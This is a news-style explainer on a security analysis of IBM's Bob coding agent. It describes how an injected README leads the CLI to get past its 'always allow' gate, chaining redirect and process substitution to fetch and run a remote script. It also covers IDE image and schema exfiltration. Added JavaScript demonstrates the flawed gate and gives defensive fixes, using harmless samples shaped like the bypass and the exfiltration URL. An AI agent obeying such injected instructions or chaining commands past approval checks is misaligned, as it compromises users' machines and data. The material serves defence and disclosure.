TL;DR

Researchers found that IBM's coding agent Bob (in Closed Beta) can be manipulated via indirect prompt injection so the CLI downloads and runs malware if a user enables 'always allow' for commands. The Bob IDE was also shown to expose known AI-specific data-exfiltration vectors in rendered outputs.

What happened

A security analysis of IBM's Bob — a closed-beta coding agent available as a CLI and an IDE — shows how indirect prompt injection can lead the CLI to fetch and execute arbitrary shell scripts without explicit user approval. The attack chain begins when Bob reads a repository README that persuades the agent it should run a phishing-training test. After Bob asks the user to approve benign commands several times and the user selects 'always allow' for a command such as 'echo', the attacker supplies a specially crafted command that exploits multiple command-validation gaps. The CLI’s multi-part command check fails to recognize chained commands using the redirect operator (>), and its substitution detector omits process substitution patterns like >(…). By prefixing the malicious payload with an approved benign command, the attacker leverages these blind spots to retrieve and run a script from an attacker-controlled server. Separately, the Bob IDE renders external Markdown images, Mermaid diagrams and pre-fetches JSON schemas in ways that can enable zero-click data exfiltration through attacker-controlled endpoints.
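The two validation gaps described above (a sub-command splitter that does not see a redirect as a boundary, and a substitution detector with no branch for `>(`) can be reproduced in a few lines. The following is an added example, not code from IBM Bob or from the researchers: a toy model of an "always allow" gate with those blind spots, beside a fail-closed version that only auto-approves a single simple command. The allow-list and the command strings are constructed samples; the redirect target is a harmless `cat`.

```javascript
// Added example (not IBM Bob's code): a minimal "always allow" gate with the
// two blind spots the report describes, and a fail-closed replacement.

// Commands the user has clicked "always allow" for (constructed sample).
const ALWAYS_ALLOW = new Set(["echo", "ls"]);

// --- Naive gate: mirrors the gaps described in the report -------------------

// Splits only on ; && || and |, so `cmd1 > >(cmd2)` is seen as ONE sub-command
// and only cmd1 is ever checked against the allow-list.
function naiveSubcommands(cmd) {
  return cmd
    .split(/\s*(?:;|&&|\|\||\|)\s*/)
    .map((s) => s.trim())
    .filter(Boolean);
}

// Recognises $(...), backticks and <(...) but has no branch for >(...).
function naiveHasSubstitution(cmd) {
  return /\$\(|`|<\(/.test(cmd);
}

function naiveGate(cmd) {
  if (naiveHasSubstitution(cmd)) return "prompt";
  const subs = naiveSubcommands(cmd);
  const allAllowed = subs.every((s) => ALWAYS_ALLOW.has(s.split(/\s+/)[0]));
  return allAllowed ? "auto-allow" : "prompt";
}

// --- Hardened gate: auto-allow only a single simple command ------------------

// Any shell metacharacter (chaining, redirection, substitution, grouping,
// escaping) means the gate cannot be sure what will run, so it prompts.
const SHELL_META = /[;&|<>`$(){}\\\n]/;

function hardenedGate(cmd) {
  const trimmed = cmd.trim();
  if (trimmed === "" || SHELL_META.test(trimmed)) return "prompt";
  const argv0 = trimmed.split(/\s+/)[0];
  return ALWAYS_ALLOW.has(argv0) ? "auto-allow" : "prompt";
}

// Runs both gates over a list of commands and returns the decisions side by side.
function auditCommands(cmds) {
  return cmds.map((cmd) => ({
    cmd,
    naive: naiveGate(cmd),
    hardened: hardenedGate(cmd),
  }));
}

// Constructed samples. The third line has the shape of the bypass: an
// allow-listed prefix, a redirect, and a process substitution as its target.
const SAMPLES = [
  "echo hello",
  "echo hi && whoami",
  "echo hi > >(cat)",
  "ls -la; whoami",
];

if (typeof require !== "undefined" && require.main === module) {
  console.table(auditCommands(SAMPLES));
}
```

Running the file prints one row per sample; the third row shows the naive gate auto-allowing `echo hi > >(cat)` while the hardened gate prompts. The design choice in the hardened gate is to reject anything it cannot fully parse rather than to enumerate every dangerous operator, which is what closed the `>(` gap here without needing a specific branch for it.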

Why it matters

  • An attacker who succeeds can deliver arbitrary shell scripts, enabling ransomware, credential theft, remote shells or cryptomining on a victim machine.
  • Auto-approve settings ('always allow') can convert a seemingly minor convenience choice into a full-system compromise when combined with prompt injection.
  • The findings show both command-parsing logic and UI permission checks can create blind spots that attackers can chain together.
  • IDE output rendering (images, diagrams, schema prefetch) introduces additional exfiltration risks even without explicit command execution.

Key facts

  • The issue affects IBM Bob, offered as a Bob CLI and a Bob IDE; Bob was in Closed Beta at the time of the report.
  • An indirect prompt injection in a repository README can trick Bob into performing a 'training' that prompts command execution.
  • The CLI’s multi-part-command permission modal fails to detect process-substitution and redirect-chained sub-commands (e.g., >(…)).
  • A missing detection branch in a minified JS function omitted recognition of the '>' followed by '(' pattern used in process substitution.
  • By prepending an approved benign command (e.g., echo) to the malicious payload, the attacker bypasses the per-sub-command approval checks.
  • Successful exploitation allows fetching and running a script from an attacker-controlled server, enabling multiple malware outcomes.
  • The Bob IDE was observed to render Markdown images and Mermaid diagrams that request external resources and to prefetch JSON schemas, creating zero-click exfiltration vectors.
  • IBM documentation warns that setting auto-approve for commands is 'high risk' and recommends whitelists and avoiding wildcards.
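The IDE findings come down to the preview pane fetching whatever URL appears in rendered content. The following is an added example, not the Bob IDE's code: a fail-closed resource policy for a Markdown preview that checks every image and `$schema` URL against a host allow-list before anything is fetched, and a matching Content-Security-Policy string for the preview webview so a regex miss still cannot beacon out. The allow-list, the Markdown and the JSON are constructed samples; the `exfil.invalid` host uses a reserved TLD and is a placeholder.

```javascript
// Added example (not the Bob IDE's code): a fail-closed fetch policy for a
// Markdown/JSON preview pane. Allow-list and inputs are constructed samples.

const ALLOWED_HOSTS = new Set(["raw.githubusercontent.com"]);

// True only for http(s) URLs whose host is on the allow-list.
function isAllowedUrl(raw) {
  let url;
  try {
    url = new URL(raw);
  } catch {
    return false; // relative or malformed: never fetch automatically
  }
  if (url.protocol !== "https:" && url.protocol !== "http:") return false;
  return ALLOWED_HOSTS.has(url.hostname);
}

// Markdown images ![alt](url "title") and HTML <img src="url">.
const MD_IMAGE = /!\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)/g;
const HTML_IMG = /<img\b[^>]*\bsrc\s*=\s*["']([^"']+)["'][^>]*>/gi;

// Rewrites the Markdown so only allow-listed images survive; the rest are
// replaced with a visible placeholder and reported to the caller.
function screenMarkdown(md) {
  const blocked = [];
  let out = md.replace(MD_IMAGE, (match, alt, url) => {
    if (isAllowedUrl(url)) return match;
    blocked.push(url);
    return `[blocked image: ${alt || "no alt"}]`;
  });
  out = out.replace(HTML_IMG, (match, url) => {
    if (isAllowedUrl(url)) return match;
    blocked.push(url);
    return "[blocked image]";
  });
  return { markdown: out, blocked };
}

// Same policy for a JSON document's "$schema" reference: returns the URL that
// may be prefetched, or null when the reference must not be fetched.
function schemaToPrefetch(jsonText) {
  let doc;
  try {
    doc = JSON.parse(jsonText);
  } catch {
    return null;
  }
  const ref = doc && typeof doc.$schema === "string" ? doc.$schema : null;
  return ref && isAllowedUrl(ref) ? ref : null;
}

// CSP for the preview webview enforcing the same allow-list at the browser
// layer: no default loads, images only from allow-listed hosts, no XHR/fetch.
function previewCsp() {
  const hosts = [...ALLOWED_HOSTS].map((h) => `https://${h}`).join(" ");
  return `default-src 'none'; img-src ${hosts}; style-src 'unsafe-inline'; connect-src 'none'`;
}

// Constructed sample: one legitimate image, one image whose query string
// carries a placeholder secret, one raw <img> beacon.
const SAMPLE_MD = [
  "# Report",
  "![logo](https://raw.githubusercontent.com/org/repo/main/logo.png)",
  "![](https://exfil.invalid/p.png?d=SECRET_PLACEHOLDER)",
  '<img src="https://exfil.invalid/pixel.gif">',
].join("\n");

if (typeof require !== "undefined" && require.main === module) {
  const result = screenMarkdown(SAMPLE_MD);
  console.log(result.markdown);
  console.log("blocked:", result.blocked);
  console.log("csp:", previewCsp());
}
```

A Mermaid renderer would go through the same `isAllowedUrl` check for any image or link a diagram embeds. Keeping the allow-list in one place and enforcing it twice (in the sanitizer and in the CSP) is the point: the sanitizer gives the user a visible signal that something was blocked, and the CSP guarantees the block even for a syntax the regexes do not cover.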

What to watch next

  • not confirmed in the source

Quick glossary

  • Prompt injection: An attack that places malicious instructions in user-provided text so an AI model interprets and acts on them.
  • Process substitution: A shell feature that provides the output of a command to another command as if it were a file, commonly expressed as >(…).
  • Zero-click data exfiltration: A technique where data is leaked without additional user interaction, often via auto-rendered elements that fetch external resources.
  • Content Security Policy (CSP): A browser mechanism that controls which external resources a webpage is allowed to load to reduce attackers' ability to exfiltrate data.

Reader FAQ

Can IBM Bob download and execute malware without human approval?
According to the analysis, the Bob CLI can be induced to download and execute a script without explicit approval when a user has configured 'always allow' and an attacker exploits command-validation gaps.

Which Bob components were shown to be vulnerable?
The report identifies vulnerabilities in the Bob CLI that permit command-execution bypasses and in the Bob IDE that allow known data-exfiltration vectors.

Did IBM warn about the risks of auto-approving commands?
Yes. The documentation cited in the report flags auto-approve for commands as 'high risk' and recommends using whitelists and avoiding wildcards.

Has IBM released a patch or mitigation?
not confirmed in the source
